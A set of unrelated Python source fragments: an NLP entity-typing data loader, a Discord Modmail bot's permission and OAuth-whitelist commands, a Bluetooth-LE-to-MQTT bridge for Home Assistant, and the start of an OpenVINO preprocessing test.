truncation_strategy='only_second',
pad_to_max_length=True,
return_tensors='pt'
)
# print(max_len, max_len_in_batch, inputs["input_ids"].size(), inputs["attention_mask"].size(),
# inputs["token_type_ids"].size())
feed_dict = {
"ex_ids": ex_ids,
"inputs":
{
"sent1": inputs_sent1,
"sent2": inputs_sent2
},
"targets": torch.from_numpy(targets)
}
if no_more_data:
if eval_data and bsz > 0:
yield feed_dict
break
yield feed_dict
class DatasetLoaderTypeReductionLR(object):
def __init__(self, data, args, tokenizer):
self.data = data
if args.goal == '60k':
self.word2id = transformer_constant.ANS2ID_DICT_60K
elif args.goal == 'ufet':
self.word2id = transformer_constant.ANS2ID_DICT_UFET
else:
print('ERROR: Invalid input... ' + args.goal)
raise
self.tokenizer = tokenizer
self.do_lower = args.do_lower
self.context_window_size = args.context_window_size
self.args = args
def _load_npz(self, path):
with open(path, 'rb') as f:
data = np.load(f)
return data
def _load_shard(self):
lines = self.data
ex_ids = list(range(len(lines)))
mention_word_sent1 = [line['sent1']["word"].split() if not self.do_lower
else line['sent1']["word"].lower().split() for line in lines]
left_seq_sent1 = [line['sent1']['left_context'][-self.context_window_size:] if not self.do_lower
else [w.lower() for w in line['sent1']['left_context']][-self.context_window_size:] for line in lines]
right_seq_sent1 = [line['sent1']['right_context'][:self.context_window_size] if not self.do_lower
else [w.lower() for w in line['sent1']['right_context']][:self.context_window_size] for line in lines]
mention_word_sent2 = [line['sent2']["word"].split() if not self.do_lower
else line['sent2']["word"].lower().split() for line in lines]
left_seq_sent2 = [line['sent2']['left_context'][-self.context_window_size:] if not self.do_lower
else [w.lower() for w in line['sent2']['left_context']][-self.context_window_size:] for line in lines]
right_seq_sent2 = [line['sent2']['right_context'][:self.context_window_size] if not self.do_lower
else [w.lower() for w in line['sent2']['right_context']][:self.context_window_size] for line in lines]
labels = [int(line['label']) for line in lines]
# Ddebug
if False:
idx = 113
print('ex_ids: ', ex_ids[idx])
print('left_seq_sent1: ', left_seq_sent1[idx])
print('right_seq_sent1: ', right_seq_sent1[idx])
print('mention_word_sent1: ', mention_word_sent1[idx])
print('left_seq_sent2: ', left_seq_sent2[idx])
print('right_seq_sent2: ', right_seq_sent2[idx])
print('mention_word_sent2: ', mention_word_sent2[idx])
print('labels:', labels[idx])
print(
'0) ex_ids:', len(ex_ids),
'1) left_seq_sent1:', len(left_seq_sent1), '2) right_seq_sent1:', len(right_seq_sent1), '3) mention_word_sent1:',
len(mention_word_sent1), '4) left_seq_sent2:', len(left_seq_sent2), '5) right_seq_sent2:', len(right_seq_sent2),
'6) mention_word_sent2:', len(mention_word_sent2), '7) labels', len(labels)
)
return zip(ex_ids, left_seq_sent1, right_seq_sent1, mention_word_sent1,
left_seq_sent2, right_seq_sent2, mention_word_sent2, labels)
def _get_sentence(self, epoch):
for i in range(0, epoch):
ids = self._load_shard()
#print('ids', list(ids))
for current_ids in ids:
yield current_ids
def get_batch(self, batch_size, max_len, epoch, eval_data=True):
return get_type_reduction_LR_example(
self._get_sentence(epoch), batch_size=batch_size, max_len=max_len,
eval_data=eval_data, tokenizer=self.tokenizer
)
def get_type_reduction_BL4NED_example(generator, batch_size, max_len,
eval_data=False, tokenizer=None):
# [cur_stream elements]
# 0: example id, 1: left context_pos1, 2: right context_pos1, 3: mention word_pos1,
# 4: left context_pos2, 5: right context_pos2, 6: mention word_pos2,
# 7: labels
cur_stream = [None] * batch_size
no_more_data = False
while True:
bsz = batch_size
seq_length = max_len
mention_length_limit = 10 # in words, not word pieces
for i in range(batch_size):
try:
cur_stream[i] = list(next(generator))
except StopIteration:
no_more_data = True
bsz = i
break
if no_more_data and bsz == 0:
break
ex_ids = np.zeros([bsz], np.object)
targets = np.zeros([bsz], np.float32)
inputs_sent1 = []
inputs_sent2 = []
sentence_len_wp_sent1 = []
sentence_len_wp_sent2 = []
for i in range(bsz):
ex_ids[i] = cur_stream[i][0]
# sent1
left_seq_sent1 = cur_stream[i][1]
right_seq_sent1 = cur_stream[i][2]
mention_seq_sent1 = cur_stream[i][3]
if len(mention_seq_sent1) > mention_length_limit:
mention_seq_sent1 = mention_seq_sent1[:mention_length_limit]
mention_sent1 = ' '.join(mention_seq_sent1)
context_sent1 = ' '.join(left_seq_sent1 + mention_seq_sent1 + right_seq_sent1)
len_after_tokenization1 = len(tokenizer.encode_plus(mention_sent1, context_sent1)['input_ids'])
if len_after_tokenization1 > max_len:
overflow_len1 = len_after_tokenization1 - max_len
context_sent1 = ' '.join(left_seq_sent1 + mention_seq_sent1 + right_seq_sent1[:-overflow_len1])
inputs_sent1.append([mention_sent1, context_sent1])
sentence_len_wp_sent1.append(len_after_tokenization1)
# sent2
left_seq_sent2 = cur_stream[i][4]
right_seq_sent2 = cur_stream[i][5]
mention_seq_sent2 = cur_stream[i][6]
if len(mention_seq_sent2) > mention_length_limit:
mention_seq_sent2 = mention_seq_sent2[:mention_length_limit]
mention_sent2 = ' '.join(mention_seq_sent2)
context_sent2 = ' '.join(left_seq_sent2 + mention_seq_sent2 + right_seq_sent2)
len_after_tokenization2 = len(tokenizer.encode_plus(mention_sent2, context_sent2)['input_ids'])
if len_after_tokenization2 > max_len:
overflow_len2 = len_after_tokenization2 - max_len
context_sent2 = ' '.join(left_seq_sent2 + mention_seq_sent2 + right_seq_sent2[:-overflow_len2])
inputs_sent2.append([mention_sent2, context_sent2])
sentence_len_wp_sent2.append(len_after_tokenization2)
# label
targets[i] = cur_stream[i][7]
# sent1
max_len_in_batch_sent1 = max(sentence_len_wp_sent1)
inputs_sent1 = tokenizer.batch_encode_plus(
inputs_sent1,
add_special_tokens=True,
max_length=min(max_len, max_len_in_batch_sent1),
truncation_strategy='only_second',
pad_to_max_length=True,
return_tensors='pt'
)
# sent2
max_len_in_batch_sent2 = max(sentence_len_wp_sent2)
inputs_sent2 = tokenizer.batch_encode_plus(
inputs_sent2,
add_special_tokens=True,
max_length=min(max_len, max_len_in_batch_sent2),
truncation_strategy='only_second',
pad_to_max_length=True,
return_tensors='pt'
)
# print(max_len, max_len_in_batch, inputs["input_ids"].size(), inputs["attention_mask"].size(),
# inputs["token_type_ids"].size())
feed_dict = {
"ex_ids": ex_ids,
"inputs":
{
"sent1": inputs_sent1,
"sent2": inputs_sent2
},
"targets": torch.from_numpy(targets)
}
if no_more_data:
if eval_data and bsz > 0:
yield feed_dict
break
yield feed_dict
class DatasetLoaderTypeReductionBL4NED(object):
def __init__(self, data, args, tokenizer):
self.data = data
if args.goal == '60k':
self.word2id = transformer_constant.ANS2ID_DICT_60K
elif args.goal == 'ufet':
self.word2id = transformer_constant.ANS2ID_DICT_UFET
else:
print('ERROR: Invalid input... ' + args.goal)
raise
self.tokenizer = tokenizer
self.do_lower = args.do_lower
self.context_window_size = args.context_window_size
self.args = args
def _load_npz(self, path):
with open(path, 'rb') as f:
data = np.load(f)
return data
def _load_shard(self):
lines = self.data # jsonlines
ex_ids = list(range(len(lines)))
mention_word_sent1 = [line['sent1']["word"].split() if not self.do_lower
else line['sent1']["word"].lower().split() for line in lines]
left_seq_sent1 = [line['sent1']['left_context'][-self.context_window_size:] if not self.do_lower
else [w.lower() for w in line['sent1']['left_context']][-self.context_window_size:] for line in lines]
right_seq_sent1 = [line['sent1']['right_context'][:self.context_window_size] if not self.do_lower
else [w.lower() for w in line['sent1']['right_context']][:self.context_window_size] for line in lines]
mention_word_sent2 | |
Modmail supporting functions)
- **Regular** [1] (most basic interactions such as help and about)
By default, owner is set to the absolute bot owner and regular is `@everyone`.
Note: You will still have to manually give/take permission to the Modmail
category to users/roles.
"""
await ctx.send_help(ctx.command)
@permissions.group(name="add", invoke_without_command=True)
@checks.has_permissions(PermissionLevel.OWNER)
async def permissions_add(self, ctx):
"""Add a permission to a command or a permission level."""
await ctx.send_help(ctx.command)
@permissions_add.command(name="command")
@checks.has_permissions(PermissionLevel.OWNER)
async def permissions_add_command(
self, ctx, command: str, *, user_or_role: Union[User, Role, str]
):
"""
Add a user, role, or everyone permission to use a command.
Do not ping `@everyone` for granting permission to everyone, use "everyone" or "all" instead,
`user_or_role` may be a role ID, name, mention, user ID, name, mention, "all", or "everyone".
"""
if command not in self.bot.all_commands:
embed = Embed(
title="Error",
color=Color.red(),
description="The command you are attempting to point "
f"to does not exist: `{command}`.",
)
return await ctx.send(embed=embed)
if hasattr(user_or_role, "id"):
value = user_or_role.id
elif user_or_role in {"everyone", "all"}:
value = -1
else:
raise commands.BadArgument(f'User or Role "{user_or_role}" not found')
await self.bot.update_perms(self.bot.all_commands[command].name, value)
embed = Embed(
title="Success",
color=self.bot.main_color,
description=f"Permission for {command} was successfully updated.",
)
return await ctx.send(embed=embed)
@permissions_add.command(name="level", aliases=["group"])
@checks.has_permissions(PermissionLevel.OWNER)
async def permissions_add_level(
self, ctx, level: str, *, user_or_role: Union[User, Role, str]
):
"""
Add a user, role, or everyone permission to use commands of a permission level.
Do not ping `@everyone` for granting permission to everyone, use "everyone" or "all" instead,
`user_or_role` may be a role ID, name, mention, user ID, name, mention, "all", or "everyone".
"""
if level.upper() not in PermissionLevel.__members__:
embed = Embed(
title="Error",
color=Color.red(),
description="The permission level you are attempting to point "
f"to does not exist: `{level}`.",
)
return await ctx.send(embed=embed)
if hasattr(user_or_role, "id"):
value = user_or_role.id
elif user_or_role in {"everyone", "all"}:
value = -1
else:
raise commands.BadArgument(f'User or Role "{user_or_role}" not found')
await self.bot.update_perms(PermissionLevel[level.upper()], value)
embed = Embed(
title="Success",
color=self.bot.main_color,
description=f"Permission for {level} was successfully updated.",
)
return await ctx.send(embed=embed)
@permissions.group(
name="remove",
aliases=["del", "delete", "rm", "revoke"],
invoke_without_command=True,
)
@checks.has_permissions(PermissionLevel.OWNER)
async def permissions_remove(self, ctx):
"""Remove permission to use a command or permission level."""
await ctx.send_help(ctx.command)
@permissions_remove.command(name="command")
@checks.has_permissions(PermissionLevel.OWNER)
async def permissions_remove_command(
self, ctx, command: str, *, user_or_role: Union[User, Role, str]
):
"""
Remove a user, role, or everyone permission to use a command.
Do not ping `@everyone` for granting permission to everyone, use "everyone" or "all" instead,
`user_or_role` may be a role ID, name, mention, user ID, name, mention, "all", or "everyone".
"""
if command not in self.bot.all_commands:
embed = Embed(
title="Error",
color=Color.red(),
description="The command you are attempting to point "
f"to does not exist: `{command}`.",
)
return await ctx.send(embed=embed)
if hasattr(user_or_role, "id"):
value = user_or_role.id
elif user_or_role in {"everyone", "all"}:
value = -1
else:
raise commands.BadArgument(f'User or Role "{user_or_role}" not found')
await self.bot.update_perms(
self.bot.all_commands[command].name, value, add=False
)
embed = Embed(
title="Success",
color=self.bot.main_color,
description=f"Permission for {command} was successfully updated.",
)
return await ctx.send(embed=embed)
@permissions_remove.command(name="level", aliases=["group"])
@checks.has_permissions(PermissionLevel.OWNER)
async def permissions_remove_level(
self, ctx, level: str, *, user_or_role: Union[User, Role, str]
):
"""
Remove a user, role, or everyone permission to use commands of a permission level.
Do not ping `@everyone` for granting permission to everyone, use "everyone" or "all" instead,
`user_or_role` may be a role ID, name, mention, user ID, name, mention, "all", or "everyone".
"""
if level.upper() not in PermissionLevel.__members__:
embed = Embed(
title="Error",
color=Color.red(),
description="The permission level you are attempting to point "
f"to does not exist: `{level}`.",
)
return await ctx.send(embed=embed)
if hasattr(user_or_role, "id"):
value = user_or_role.id
elif user_or_role in {"everyone", "all"}:
value = -1
else:
raise commands.BadArgument(f'User or Role "{user_or_role}" not found')
await self.bot.update_perms(PermissionLevel[level.upper()], value, add=False)
embed = Embed(
title="Success",
color=self.bot.main_color,
description=f"Permission for {level} was successfully updated.",
)
return await ctx.send(embed=embed)
@permissions.group(name="get", invoke_without_command=True)
@checks.has_permissions(PermissionLevel.OWNER)
async def permissions_get(self, ctx, *, user_or_role: Union[User, Role, str]):
"""
View the currently-set permissions.
You can specify `user_or_role` as an alternative to get-by-command or get-by-level.
Do not ping `@everyone` for granting permission to everyone, use "everyone" or "all" instead,
`user_or_role` may be a role ID, name, mention, user ID, name, mention, "all", or "everyone".
"""
if hasattr(user_or_role, "id"):
value = user_or_role.id
elif user_or_role in {"everyone", "all"}:
value = -1
else:
raise commands.BadArgument(f'User or Role "{user_or_role}" not found')
cmds = []
levels = []
for cmd in self.bot.commands:
permissions = self.bot.config.command_permissions.get(cmd.name, [])
if value in permissions:
cmds.append(cmd.name)
for level in PermissionLevel:
permissions = self.bot.config.level_permissions.get(level.name, [])
if value in permissions:
levels.append(level.name)
mention = user_or_role.name if hasattr(user_or_role, "name") else user_or_role
desc_cmd = (
", ".join(map(lambda x: f"`{x}`", cmds))
if cmds
else "No permission entries found."
)
desc_level = (
", ".join(map(lambda x: f"`{x}`", levels))
if levels
else "No permission entries found."
)
embeds = [
Embed(
title=f"{mention} has permission with the following commands:",
description=desc_cmd,
color=self.bot.main_color,
),
Embed(
title=f"{mention} has permission with the following permission groups:",
description=desc_level,
color=self.bot.main_color,
),
]
p_session = PaginatorSession(ctx, *embeds)
return await p_session.run()
@permissions_get.command(name="command")
@checks.has_permissions(PermissionLevel.OWNER)
async def permissions_get_command(self, ctx, *, command: str = None):
"""View currently-set permissions for a command."""
def get_command(cmd):
permissions = self.bot.config.command_permissions.get(cmd.name, [])
if not permissions:
embed = Embed(
title=f"Permission entries for command `{cmd.name}`:",
description="No permission entries found.",
color=self.bot.main_color,
)
else:
values = []
for perm in permissions:
if perm == -1:
values.insert(0, "**everyone**")
continue
member = ctx.guild.get_member(perm)
if member is not None:
values.append(member.mention)
continue
user = self.bot.get_user(perm)
if user is not None:
values.append(user.mention)
continue
role = ctx.guild.get_role(perm)
if role is not None:
values.append(role.mention)
else:
values.append(str(perm))
embed = Embed(
title=f"Permission entries for command `{cmd.name}`:",
description=", ".join(values),
color=self.bot.main_color,
)
return embed
embeds = []
if command is not None:
if command not in self.bot.all_commands:
embed = Embed(
title="Error",
color=Color.red(),
description="The command you are attempting to point "
f"to does not exist: `{command}`.",
)
return await ctx.send(embed=embed)
embeds.append(get_command(self.bot.all_commands[command]))
else:
for cmd in self.bot.commands:
embeds.append(get_command(cmd))
p_session = PaginatorSession(ctx, *embeds)
return await p_session.run()
@permissions_get.command(name="level", aliases=["group"])
@checks.has_permissions(PermissionLevel.OWNER)
async def permissions_get_level(self, ctx, *, level: str = None):
"""View currently-set permissions for commands of a permission level."""
def get_level(perm_level):
permissions = self.bot.config.level_permissions.get(perm_level.name, [])
if not permissions:
embed = Embed(
title="Permission entries for permission "
f"level `{perm_level.name}`:",
description="No permission entries found.",
color=self.bot.main_color,
)
else:
values = []
for perm in permissions:
if perm == -1:
values.insert(0, "**everyone**")
continue
member = ctx.guild.get_member(perm)
if member is not None:
values.append(member.mention)
continue
user = self.bot.get_user(perm)
if user is not None:
values.append(user.mention)
continue
role = ctx.guild.get_role(perm)
if role is not None:
values.append(role.mention)
else:
values.append(str(perm))
embed = Embed(
title=f"Permission entries for permission level `{perm_level.name}`:",
description=", ".join(values),
color=self.bot.main_color,
)
return embed
embeds = []
if level is not None:
if level.upper() not in PermissionLevel.__members__:
embed = Embed(
title="Error",
color=Color.red(),
description="The permission level you are attempting to point "
f"to does not exist: `{level}`.",
)
return await ctx.send(embed=embed)
embeds.append(get_level(PermissionLevel[level.upper()]))
else:
for perm_level in PermissionLevel:
embeds.append(get_level(perm_level))
p_session = PaginatorSession(ctx, *embeds)
return await p_session.run()
@commands.group(invoke_without_command=True)
@checks.has_permissions(PermissionLevel.OWNER)
async def oauth(self, ctx):
"""Commands relating to Logviewer oauth2 login authentication.
This functionality on your logviewer site is a [**Patron**](https://patreon.com/kyber) only feature.
"""
await ctx.send_help(ctx.command)
@oauth.command(name="whitelist")
@checks.has_permissions(PermissionLevel.OWNER)
async def oauth_whitelist(self, ctx, target: Union[User, Role]):
"""
Whitelist or un-whitelist a user or role to have access to logs.
`target` may be a role ID, name, mention, user ID, name, or mention.
"""
whitelisted = self.bot.config["oauth_whitelist"]
if target.id in whitelisted:
whitelisted.remove(target.id)
removed = True
else:
whitelisted.append(target.id)
removed = False
await self.bot.config.update()
embed = Embed(color=self.bot.main_color)
embed.title = "Success"
if not hasattr(target, "mention"):
target = self.bot.get_user(target.id) or self.bot.modmail_guild.get_role(
target.id
)
embed.description = (
f"{'Un-w' if removed else 'W'}hitelisted " f"{target.mention} to view logs."
)
await ctx.send(embed=embed)
@oauth.command(name="show", aliases=["get", "list", "view"])
@checks.has_permissions(PermissionLevel.OWNER)
async def oauth_show(self, ctx):
"""Shows a list of users and roles that are whitelisted to view logs."""
whitelisted = self.bot.config["oauth_whitelist"]
users = []
roles = []
for id_ in whitelisted:
user = self.bot.get_user(id_)
if user:
users.append(user)
role = self.bot.modmail_guild.get_role(id_)
if role:
roles.append(role)
embed = Embed(color=self.bot.main_color)
embed.title = "Oauth Whitelist"
embed.add_field(
name="Users", value=" ".join(u.mention for u in users) or "None"
)
embed.add_field(
name="Roles", value=" ".join(r.mention for r in roles) or | |
<gh_stars>0
import asyncio as aio
import json
import logging
import typing as ty
from contextlib import asynccontextmanager
from uuid import getnode
import aio_mqtt
from bleak import BleakError, BleakScanner
from bleak.backends.device import BLEDevice
from .devices.base import (BINARY_SENSOR_DOMAIN, LIGHT_DOMAIN, SENSOR_DOMAIN,
SWITCH_DOMAIN, ConnectionTimeoutError, Device,
done_callback)
logger = logging.getLogger(__name__)
CONFIG_MQTT_NAMESPACE = 'homeassistant'
SENSOR_STATE_TOPIC = 'state'
BLUETOOTH_ERROR_RECONNECTION_TIMEOUT = 60
FAILURE_LIMIT = 5
ListOfConnectionErrors = (
BleakError,
aio.TimeoutError,
# dbus-next exceptions:
# AttributeError: 'NoneType' object has no attribute 'call'
AttributeError,
# https://github.com/hbldh/bleak/issues/409
EOFError,
)
BLUETOOTH_RESTARTING = aio.Lock()
async def run_tasks_and_cancel_on_first_return(*tasks: aio.Future,
return_when=aio.FIRST_COMPLETED,
ignore_futures=(),
) -> ty.Sequence[aio.Future]:
async def cancel_tasks(_tasks) -> ty.List[aio.Task]:
# cancel first, then await. Because other tasks can raise exceptions
# while switching tasks
canceled = []
for t in _tasks:
if t in ignore_futures:
continue
if not t.done():
t.cancel()
canceled.append(t)
tasks_raise_exceptions = []
for t in canceled:
try:
await t
except aio.CancelledError:
pass
except Exception:
logger.exception(
f'Unexpected exception while cancelling tasks! {t}',
)
tasks_raise_exceptions.append(t)
return tasks_raise_exceptions
assert all(isinstance(t, aio.Future) for t in tasks)
try:
# NB: pending tasks can still raise exception or finish
# while tasks are switching
done, pending = await aio.wait(tasks, return_when=return_when)
except aio.CancelledError:
await cancel_tasks(tasks)
# it could happen that tasks raised exception and canceling wait task
# abandons tasks with exception
for t in tasks:
if not t.done() or t.cancelled():
continue
try:
t.result()
# no CancelledError expected
except Exception:
logger.exception(
f'Task raises exception while cancelling parent coroutine '
f'that waits for it {t}')
raise
# while switching tasks for await other pending tasks can raise an exception
# we need to append more tasks to the result if so
await cancel_tasks(pending)
task_remains = [t for t in pending if not t.cancelled()]
return [*done, *task_remains]
async def handle_returned_tasks(*tasks: aio.Future):
raised = [t for t in tasks if t.done() and t.exception()]
returned_normally = set(tasks) - set(raised)
results = []
if raised:
task_for_raise = raised.pop()
for t in raised:
try:
await t
except aio.CancelledError:
raise
except Exception:
logger.exception('Task raised an error')
await task_for_raise
for t in returned_normally:
results.append(await t)
return results
def hardware_exception_occurred(exception):
ex_str = str(exception)
return (
'org.freedesktop.DBus.Error.ServiceUnknown' in ex_str or
'org.freedesktop.DBus.Error.NoReply' in ex_str or
'org.freedesktop.DBus.Error.AccessDenied' in ex_str or
'org.bluez.Error.Failed: Connection aborted' in ex_str or
'org.bluez.Error.NotReady' in ex_str or
'org.bluez.Error.InProgress' in ex_str
)
ListOfMQTTConnectionErrors = (
aio_mqtt.ConnectionLostError,
aio_mqtt.ConnectionClosedError,
aio_mqtt.ServerDiedError,
BrokenPipeError,
)
async def restart_bluetooth():
if BLUETOOTH_RESTARTING.locked():
await aio.sleep(9)
return
async with BLUETOOTH_RESTARTING:
logger.warning('Restarting bluetoothd...')
proc = await aio.create_subprocess_exec(
'hciconfig', 'hci0', 'down',
)
await proc.wait()
proc = await aio.create_subprocess_exec(
'/etc/init.d/bluetoothd', 'restart',
)
await proc.wait()
await aio.sleep(3)
proc = await aio.create_subprocess_exec(
'hciconfig', 'hci0', 'up',
)
await proc.wait()
await aio.sleep(5)
logger.warning('Restarting bluetoothd finished')
@asynccontextmanager
async def handle_ble_exceptions():
try:
yield
except ListOfConnectionErrors as e:
if hardware_exception_occurred(e):
await restart_bluetooth()
await aio.sleep(3)
raise
class DeviceManager:
def __init__(self, device, mqtt_client, base_topic):
self.device: Device = device
self._mqtt_client = mqtt_client
self._base_topic = base_topic
self.manage_task = None
async def close(self):
if self.manage_task and not self.manage_task.done():
self.manage_task.cancel()
try:
await self.manage_task
except aio.CancelledError:
pass
self.manage_task = None
try:
await self.device.close()
except aio.CancelledError:
raise
except Exception:
logger.exception(f'Problem on closing device {self.device}')
def run_task(self) -> aio.Task:
assert not self.manage_task, \
f'{self.device} Previous task was not finished! {self.manage_task}'
self.manage_task = aio.create_task(self.manage_device())
return self.manage_task
async def publish_topic_callback(self, topic, value):
logger.debug(f'call publish callback topic={topic} value={value}')
await self._mqtt_client.publish(
aio_mqtt.PublishableMessage(
topic_name='/'.join((self._base_topic, topic)),
payload=value,
qos=aio_mqtt.QOSLevel.QOS_1,
),
)
def _get_topic(self, dev_id, subtopic, *args):
return '/'.join((self._base_topic, dev_id, subtopic, *args))
async def send_device_config(self):
device = self.device
device_info = {
'identifiers': [
device.unique_id,
],
'name': device.unique_name,
'model': device.model,
}
if device.manufacturer:
device_info['manufacturer'] = device.manufacturer
if device.version:
device_info['sw_version'] = device.version
def get_generic_vals(entity: dict):
name = entity.pop('name')
result = {
'name': f'{name}_{device.dev_id}',
'unique_id': f'{name}_{device.dev_id}',
'device': device_info,
}
icon = entity.pop('icon', None)
if icon:
result['icon'] = f'mdi:{icon}'
entity.pop('topic', None)
entity.pop('json', None)
entity.pop('main_value', None)
result.update(entity)
return result
messages_to_send = []
sensor_entities = device.entities.get(SENSOR_DOMAIN, [])
sensor_entities.append(
{
'name': 'linkquality',
'unit_of_measurement': 'lqi',
'icon': 'signal',
},
)
entities = {
**device.entities,
SENSOR_DOMAIN: sensor_entities,
}
for cls, entities in entities.items():
if cls in (BINARY_SENSOR_DOMAIN, SENSOR_DOMAIN):
for entity in entities:
entity_name = entity['name']
state_topic = self._get_topic(
device.unique_id,
entity.get('topic', SENSOR_STATE_TOPIC),
)
config_topic = '/'.join((
CONFIG_MQTT_NAMESPACE,
cls,
device.dev_id,
entity_name,
'config',
))
if entity.get('json') and entity.get('main_value'):
state_topic_part = {
'json_attributes_topic': state_topic,
'state_topic': state_topic,
'value_template':
f'{{{{ value_json.{entity["main_value"]} }}}}',
}
else:
state_topic_part = {
'state_topic': state_topic,
'value_template':
f'{{{{ value_json.{entity_name} }}}}',
}
payload = json.dumps({
**get_generic_vals(entity),
**state_topic_part,
})
logger.debug(
f'Publish config topic={config_topic}: {payload}',
)
messages_to_send.append(
aio_mqtt.PublishableMessage(
topic_name=config_topic,
payload=payload,
qos=aio_mqtt.QOSLevel.QOS_1,
retain=True,
),
)
if cls == SWITCH_DOMAIN:
for entity in entities:
entity_name = entity['name']
state_topic = self._get_topic(device.unique_id, entity_name)
command_topic = '/'.join((state_topic, device.SET_POSTFIX))
config_topic = '/'.join((
CONFIG_MQTT_NAMESPACE,
cls,
device.dev_id,
entity_name,
'config',
))
payload = json.dumps({
**get_generic_vals(entity),
'state_topic': state_topic,
'command_topic': command_topic,
})
logger.debug(
f'Publish config topic={config_topic}: {payload}',
)
messages_to_send.append(
aio_mqtt.PublishableMessage(
topic_name=config_topic,
payload=payload,
qos=aio_mqtt.QOSLevel.QOS_1,
retain=True,
),
)
# TODO: send real state on receiving status from a device
logger.debug(f'Publish initial state topic={state_topic}')
await self._mqtt_client.publish(
aio_mqtt.PublishableMessage(
topic_name=state_topic,
payload='OFF',
qos=aio_mqtt.QOSLevel.QOS_1,
),
)
if cls == LIGHT_DOMAIN:
for entity in entities:
entity_name = entity['name']
state_topic = self._get_topic(device.unique_id, entity_name)
set_topic = self._get_topic(
device.unique_id,
entity_name,
device.SET_POSTFIX,
)
config_topic = '/'.join((
CONFIG_MQTT_NAMESPACE,
cls,
device.dev_id,
entity_name,
'config',
))
payload = json.dumps({
**get_generic_vals(entity),
'schema': 'json',
'rgb': entity.get('rgb', True),
'brightness': entity.get('brightness', True),
'state_topic': state_topic,
'command_topic': set_topic,
})
logger.debug(
f'Publish config topic={config_topic}: {payload}',
)
messages_to_send.append(
aio_mqtt.PublishableMessage(
topic_name=config_topic,
payload=payload,
qos=aio_mqtt.QOSLevel.QOS_1,
retain=True,
),
)
await aio.gather(*[
self._mqtt_client.publish(message)
for message in messages_to_send
])
device.config_sent = True
async def manage_device(self):
device = self.device
logger.debug(f'Start managing device={device}')
failure_count = 0
missing_device_count = 0
while True:
async with BLUETOOTH_RESTARTING:
logger.debug(f'[{device}] Check for lock')
try:
async with handle_ble_exceptions():
await device.connect()
initial_coros = []
if not device.is_passive:
if not device.DEVICE_DROPS_CONNECTION:
initial_coros.append(device.disconnected_event.wait)
await device.get_device_data()
failure_count = 0
missing_device_count = 0
if device.subscribed_topics:
await self._mqtt_client.subscribe(*[
(
'/'.join((self._base_topic, topic)),
aio_mqtt.QOSLevel.QOS_1,
)
for topic in device.subscribed_topics
])
logger.debug(f'[{device}] mqtt subscribed')
coros = [
*[coro() for coro in initial_coros],
device.handle(
self.publish_topic_callback,
send_config=self.send_device_config,
),
]
will_handle_messages = bool(device.subscribed_topics)
if will_handle_messages:
coros.append(
device.handle_messages(self.publish_topic_callback),
)
tasks = [aio.create_task(t) for t in coros]
logger.debug(f'[{device}] tasks are created')
await run_tasks_and_cancel_on_first_return(*tasks)
if device.disconnected_event.is_set():
logger.debug(f'{device} has disconnected')
finished = [t for t in tasks if not t.cancelled()]
await handle_returned_tasks(*finished)
except aio.CancelledError:
raise
except KeyboardInterrupt:
raise
except ConnectionTimeoutError:
missing_device_count += 1
logger.error(
f'[{device}] connection problem, '
f'attempts={missing_device_count}',
)
except (ConnectionError, TimeoutError, aio.TimeoutError):
missing_device_count += 1
logger.exception(
f'[{device}] connection problem, '
f'attempts={missing_device_count}',
)
except ListOfConnectionErrors as e:
if 'Device with address' in str(e) and \
'was not found' in str(e):
missing_device_count += 1
logger.warning(
f'Error while connecting to {device}, {e} {repr(e)}, '
f'attempts={missing_device_count}',
)
else:
# if isinstance(e, aio.TimeoutError) or \
# 'org.bluez.Error.Failed: Connection aborted' in \
# str(e):
failure_count += 1
logger.warning(
f'Error while connecting to {device}, {e} {repr(e)}, '
f'failure_count={failure_count}',
)
# sometimes LYWSD03MMC devices remain connected
# and doesn't advert their presence.
# If cannot find device for several attempts, restart
# the bluetooth chip
if missing_device_count >= device.CONNECTION_FAILURES_LIMIT:
logger.error(
f'Device {device} was not found for '
f'{missing_device_count} times. Restarting bluetooth.',
)
missing_device_count = 0
await restart_bluetooth()
finally:
try:
await aio.wait_for(device.close(), timeout=10)
except aio.CancelledError:
raise
except Exception:
logger.exception(f'{device} problem on device.close()')
try:
canceled = []
for t in tasks:
if not t.done():
t.cancel()
canceled.append(t)
for t in canceled:
try:
t.result()
except aio.CancelledError:
pass
except aio.CancelledError:
raise
except Exception:
pass
if failure_count >= FAILURE_LIMIT:
await restart_bluetooth()
failure_count = 0
try:
if not device.disconnected_event.is_set():
await aio.wait_for(
device.disconnected_event.wait(),
timeout=10,
)
except aio.TimeoutError:
logger.exception(f'{device} not disconnected in 10 secs')
logger.debug(
f'Sleep for {device.RECONNECTION_SLEEP_INTERVAL} secs to '
f'reconnect to device={device}',
)
await aio.sleep(device.RECONNECTION_SLEEP_INTERVAL)
class Ble2Mqtt:
TOPIC_ROOT = 'ble2mqtt'
BRIDGE_TOPIC = 'bridge'
def __init__(
self,
host: str,
port: int = None,
user: ty.Optional[str] = None,
password: ty.Optional[str] = None,
reconnection_interval: int = 10,
loop: ty.Optional[aio.AbstractEventLoop] = None,
*,
base_topic,
mqtt_prefix,
) -> None:
self._mqtt_host = host
self._mqtt_port = port
self._mqtt_user = user
self._mqtt_password = password
self._base_topic = base_topic
self._mqtt_prefix = mqtt_prefix
self._reconnection_interval = reconnection_interval
self._loop = loop or aio.get_event_loop()
self._mqtt_client = aio_mqtt.Client(
client_id_prefix=f'{base_topic}_',
loop=self._loop,
)
self._device_managers: ty.Dict[Device, DeviceManager] = {}
self.availability_topic = '/'.join((
self._base_topic,
self.BRIDGE_TOPIC,
SENSOR_STATE_TOPIC,
))
self.device_registry: ty.List[Device] = []
async def start(self):
result = await run_tasks_and_cancel_on_first_return(
self._loop.create_task(self._connect_forever()),
self._loop.create_task(self._handle_messages()),
)
for t in result:
await t
async def close(self) -> None:
for device, manager in self._device_managers.items():
await manager.close()
if self._mqtt_client.is_connected:
try:
await self._mqtt_client.disconnect()
except aio.CancelledError:
| |
# Copyright (C) 2018-2021 Intel Corporation
# SPDX-License-Identifier: Apache-2.0
import unittest
from argparse import Namespace
from openvino.tools.mo.utils.error import Error
import numpy as np
try:
# pylint: disable=no-name-in-module,import-error
from openvino.tools.mo.back.preprocessing import apply_preprocessing
# pylint: disable=no-name-in-module,import-error
import openvino.runtime.opset8 as ops
from openvino.runtime import Model, Layout, PartialShape
except Exception:
print("No OpenVINO API available,"
"ensure to set correct PYTHONPATH when running these tests")
raise
def create_function2(shape1=[2, 2], shape2=[2, 2], dtype1=np.float32, dtype2=np.float32):
input1 = ops.parameter(shape1, dtype=dtype1, name="input1")
input1.get_output_tensor(0).set_names({'input1', 'input1a'})
